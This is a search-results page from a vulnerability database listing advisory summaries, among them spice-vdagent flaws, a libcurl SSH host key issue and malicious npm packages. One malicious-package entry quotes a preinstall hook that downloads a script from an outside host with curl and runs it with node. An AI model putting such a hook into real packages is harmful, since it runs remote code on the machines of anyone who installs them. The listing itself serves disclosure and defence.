Lucene search
K

56 matches found

AlpineLinux
AlpineLinux
added 4 days ago5 views

CVE-2026-9547

When a libcurl-based application performs transfers via SCP:// or SFTP:// and utilizes the CURLOPTSSHKEYFUNCTION callback, it may silently accept an untrusted server. This vulnerability occurs when a server presents a host key type that does not match the specific key type already recorded for th...

7.4CVSS6AI score0.00187EPSS
Exploits0
NVD
NVD
added 2026/06/29 9:16 a.m.9 views

CVE-2026-57965

A flaw was found in spice-vdagent. A malicious or compromised SPICE host can trigger an integer overflow by sending a specially crafted message. This vulnerability can lead to a heap buffer overflow, causing the spice-vdagent daemon to crash and resulting in a Denial of Service DoS for the virtua...

5.1CVSS0.00123EPSS
Exploits0References2
NVD
NVD
added 2026/06/29 9:16 a.m.8 views

CVE-2026-57966

A path traversal vulnerability was found in spice-vdagent. This flaw allows a malicious or compromised SPICE host to write arbitrary files to any location on the guest operating system. This occurs because the filename provided by the SPICE host during file transfers is not properly sanitized...

4.4CVSS0.00137EPSS
Exploits0References2
ATTACKERKB
ATTACKERKB
added 2026/06/29 7:53 a.m.6 views

CVE-2026-57966

A path traversal vulnerability was found in spice-vdagent. This flaw allows a malicious or compromised SPICE host to write arbitrary files to any location on the guest operating system. This occurs because the filename provided by the SPICE host during file transfers is not properly sanitized...

4.4CVSS5.9AI score0.00137EPSS
Exploits0References3
Cvelist
Cvelist
added 2026/06/29 7:53 a.m.33 views

CVE-2026-57966 Spice-vdagent: path traversal in file transfer via unsanitized filename

A path traversal vulnerability was found in spice-vdagent. This flaw allows a malicious or compromised SPICE host to write arbitrary files to any location on the guest operating system. This occurs because the filename provided by the SPICE host during file transfers is not properly sanitized...

4.4CVSS0.00137EPSS
Exploits0References2
CVE
CVE
added 2026/06/29 7:53 a.m.17 views

CVE-2026-57966

Summary (CVE-2026-57966): A path traversal flaw in spice-vdagent allows a malicious/untrusted SPICE host to write arbitrary files on the guest filesystem via an unsanitized filename during file transfers. The vulnerability enables writes with the spice-vdagent process privileges (usually the logg...

4.4CVSS5.9AI score0.00137EPSS
Exploits0References2
Cvelist
Cvelist
added 2026/06/29 7:53 a.m.32 views

CVE-2026-57965 Spice-vdagent: integer overflow in udscs_write() leading to heap buffer overflow

A flaw was found in spice-vdagent. A malicious or compromised SPICE host can trigger an integer overflow by sending a specially crafted message. This vulnerability can lead to a heap buffer overflow, causing the spice-vdagent daemon to crash and resulting in a Denial of Service DoS for the virtua...

5.1CVSS0.00123EPSS
Exploits0References2
CVE
CVE
added 2026/06/29 7:53 a.m.14 views

CVE-2026-57965

CVE-2026-57965 describes a vulnerability in spice-vdagent where an integer overflow in udscs_write() can cause a heap buffer overflow, crashing the spice-vdagent daemon and resulting in a Denial of Service for the guest VM. Exploitation requires a malicious or compromised SPICE host, i.e., an unt...

5.1CVSS5.9AI score0.00123EPSS
Exploits0References2
RedhatCVE
RedhatCVE
added 2026/06/29 7:53 a.m.5 views

CVE-2026-57965

A flaw was found in spice-vdagent. A malicious or compromised SPICE host can trigger an integer overflow by sending a specially crafted message. This vulnerability can lead to a heap buffer overflow, causing the spice-vdagent daemon to crash and resulting in a Denial of Service DoS for the virtua...

5.1CVSS5.9AI score0.00123EPSS
Exploits0References3
Positive Technologies
Positive Technologies
added 2026/06/29 12:0 a.m.11 views

PT-2026-53237

Name of the Vulnerable Software and Affected Versions spice-vdagent affected versions not specified Description A flaw exists where a malicious or compromised SPICE host can trigger an integer overflow by sending a specially crafted message. This occurs within the udscs write function, which can...

5.1CVSS6.3AI score0.00123EPSS
Exploits0References7
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/11 12:38 p.m.12 views

Malicious code in sn-internal-testjgsakjdkjadkjahsdkjad (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b71b954927bd19d1ae8c3bef3965b4cbbaae3cc1f29c34ae6f90f36b2cd7f7fe package.json declares a preinstall lifecycle hook that runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js. On any npm install,...

5.4AI score
Exploits0References2
OSV
OSV
added 2026/05/21 4:28 p.m.10 views

MAL-2026-4703 Malicious code in veteran (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 70a20dd9f8d6a9df01d766c25693711d90e4303e3c68fa371f0b842f83c485b4 On npm install, the package's postinstall hook install.js, registered via package.json line 10 "postinstall": "node install.js" downloads a...

6AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/21 4:28 p.m.14 views

Malicious code in veteran (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 70a20dd9f8d6a9df01d766c25693711d90e4303e3c68fa371f0b842f83c485b4 On npm install, the package's postinstall hook install.js, registered via package.json line 10 "postinstall": "node install.js" downloads a...

6AI score
Exploits0References3
Veracode
Veracode
added 2026/05/16 5:23 a.m.5 views

Improper Access Control

Kata Containers is vulnerable to Improper Access Control. The vulnerability is due to an oversight in the CopyFile policy and/or handler, which allows an untrusted host to write files to arbitrary locations within the guest workload image, enabling an attacker to overwrite binaries, compromise...

8.8CVSS6AI score0.00269EPSS
Exploits0References9Affected Software1
EUVD
EUVD
added 2025/10/16 3:30 p.m.5 views

EUVD-2025-34769

FelixRiddle dev-jobs-handlebars 1.0 uses absolute password-reset magic links using the untrusted req.headers.host header and forces the http:// scheme. An attacker who can control the Host header or exploit a misconfigured proxy/load-balancer that forwards the header unchanged can cause reset lin...

8.2CVSS6.4AI score0.00394EPSS
Exploits0References4
Vulnrichment
Vulnrichment
added 2025/10/16 12:0 a.m.3 views

CVE-2025-61536

FelixRiddle dev-jobs-handlebars 1.0 uses absolute password-reset magic links using the untrusted req.headers.host header and forces the http:// scheme. An attacker who can control the Host header or exploit a misconfigured proxy/load-balancer that forwards the header unchanged can cause reset lin...

6.5AI score0.00394EPSS
Exploits0References2
CNNVD
CNNVD
added 2025/10/16 12:0 a.m.4 views

Dev jobs handlebars 安全漏洞

Dev jobs handlebars is a job search program by Felix Individual Developers. A security vulnerability exists in Dev jobs handlebars version 1.0 that stems from the use of an untrusted req.headers.host header to generate an absolute password reset link and force the use of an http scheme, which cou...

8.2CVSS6.8AI score0.00394EPSS
Exploits0References2
CVE
CVE
added 2025/10/16 12:0 a.m.10 views

CVE-2025-61536

FelixRiddle dev-jobs-handlebars 1.0 is affected by CVE-2025-61536. The issue arises from generating absolute password-reset (magic) links using the untrusted req.headers.host header and forcing the http:// scheme. This allows an attacker who can control the Host header (or a misconfigured proxy/l...

8.2CVSS6.5AI score0.00394EPSS
Exploits0References2
EUVD
EUVD
added 2025/10/07 12:30 a.m.6 views

EUVD-2020-19679

Malware in sbrugna...

7.5CVSS7.5AI score0.01251EPSS
Exploits0References5
SUSE CVE
SUSE CVE
added 2025/01/12 12:14 a.m.4 views

SUSE CVE-2024-57793

In the Linux kernel, the following vulnerability has been resolved: virt: tdx-guest: Just leak decrypted memory on unrecoverable errors In CoCo VMs it is possible for the untrusted host to cause setmemorydecrypted to fail such that an error is returned and the resulting memory is shared. Callers...

8.4CVSS7.6AI score0.00189EPSS
Exploits0References43
Rows per page
Query Builder